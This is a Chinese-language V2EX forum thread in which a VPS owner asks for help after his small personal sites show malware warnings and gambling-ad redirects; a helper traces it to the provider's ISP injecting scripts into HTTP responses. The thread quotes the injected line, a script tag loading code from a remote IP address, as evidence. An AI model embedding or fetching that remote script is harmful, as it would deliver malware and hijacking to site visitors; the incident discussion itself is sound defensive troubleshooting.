遇到一个棘手的问题,服务器被注入恶意软件了,求助。

2017-01-14 12:39:40 +08:00
 ob
自己在 VPS 上面搭建本人的一两个小站,今天早上访问的时候突然弹出恶意软件的提示:

chrome 访问时的红色警告:
----------------------------------------------------
您要访问的网站包含恶意软件

攻击者可能会试图通过 60.210.98.240 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)。
自动向 Google 报告可能出现的安全事件的详细信息。隐私权政策
----------------------------------------------------
其他浏览器也是,点继续访问,文章旁边就显示各种菠菜网站,还有直接跳转到菠菜网站的地址。

网站都没怎么公开过,基本上都是个人在使用。
测试情况:
第一个网站:主页不会,然后点进去的文章,大部分都会提示这个警告,然后有个别文章又不会。
第二个网站:主页和其他链接都直接提示。
本地代码连远程数据库访问正常。
两个网站的代码都很干净。
----------------------------------------------------
近期对服务器的操作,除了用一键脚本安装 kcptun (很多天前的,服务也已经停止,都没启用),也没啥异常操作。

服务器现在都能正常登录操作。用 last 也没看出什么异常 ip 。
有人遇到过这种情况么,具体要怎么排查问题?
紧急求助,谢谢大家!
4806 次点击
所在节点    问与答
32 条回复
claysec
2017-01-14 12:45:07 +08:00
被人做了 seo 呗,先检查服务器有没有问题,没有的话去谷歌那边申诉下咯
ob
2017-01-14 12:57:58 +08:00
@claysec seo 不大可能吧,我两个站每天的 ip 访问量就我一个,像是内部因素引起的。
zk8802
2017-01-14 14:38:20 +08:00
@ob 楼主留个邮箱,我私下联系你。
Famio
2017-01-14 14:42:31 +08:00
养成良好维护习惯。例如我,定期做快照,出问题解决不了直接回滚。爽啊~~~
另外,网站附上啊
ob
2017-01-14 15:33:50 +08:00
ob
2017-01-14 15:42:09 +08:00
@Famio
aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
私人用网站,就不直接公开,想看被感染的效果用 base64 转下。
点确点会跳到菠菜网站,点取消,会直接在主页旁边显示广告出来。

@zk8802
ob
2017-01-14 15:48:08 +08:00
@zk8802
@Famio

在顶部直接被插入了一行:
<script src=http://60.210.98.240:280/jquery2.js></script>

确认过,在代码里面是没有的,不知道怎么做到的,域名采用 dnspod.cn 解析.
artandlol
2017-01-14 16:13:24 +08:00
@ob 页面贴下
看大家是否一样
如果都类似说明你的站被黑了
cos
2017-01-14 16:21:41 +08:00
首先还是排除一下你本地的系统是否干净吧,比如搞张 linux livecd 启动后再浏览你的网站看看,再就是路由器,再就是 ISP 的 http 劫持,一个个都排除了,那就是服务器的问题了,另外,有些虚拟主机服务商也会给网站插广告代码的。。。
ob
2017-01-14 16:45:52 +08:00
@artandlol
aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
用 base64 转下能看到。
ob
2017-01-14 16:48:37 +08:00
@cos 手机浏览器上面访问都出问题,然后在 pc 上面一样的情况。排除 ISP 的 http 劫持。
我买的这个好几年了,正常应该是不会,后面找不到问题,我提个工单问一下。
再不行,得重装系统了,要弄一大堆东西,比较麻烦。
目前不知道怎么排查这个问题。
zk8802
2017-01-14 16:56:35 +08:00
@ob 我没有微信,用邮件联系吧。我可以帮你排查一下问题。
ob
2017-01-14 17:05:04 +08:00
zk8802
2017-01-14 17:14:03 +08:00
@ob 你先把网站下线吧,我已经找到漏洞了。
ob
2017-01-14 17:16:14 +08:00
@zk8802 好的
ob
2017-01-14 17:16:35 +08:00
@zk8802 已停止
zk8802
2017-01-14 17:17:41 +08:00
@ob 已发邮件,请查收。
zk8802
2017-01-14 18:49:28 +08:00
经过排查,发现不是服务器的问题,而是服务器那边 ISP 劫持了所有 HTTP/1.{0,1} 200 的内容,在页面开头插入了恶意脚本。

最明显的证据是同 C 段主机的内容也被劫持了,比如 curl -v http://118.193.216.206 ,会发现这个页面的开头也有劫持代码。

最后非常感谢 @ob 的配合,因为相信互联网上的陌生人是需要极大勇气的。
vimffs
2017-01-14 18:58:09 +08:00
我看到和 7 楼的一样。
cyr1l
2017-01-14 19:07:01 +08:00
ISP 劫持网页放博彩网站的广告,这胆子也太大了,有点猖狂了吧。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/334550

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX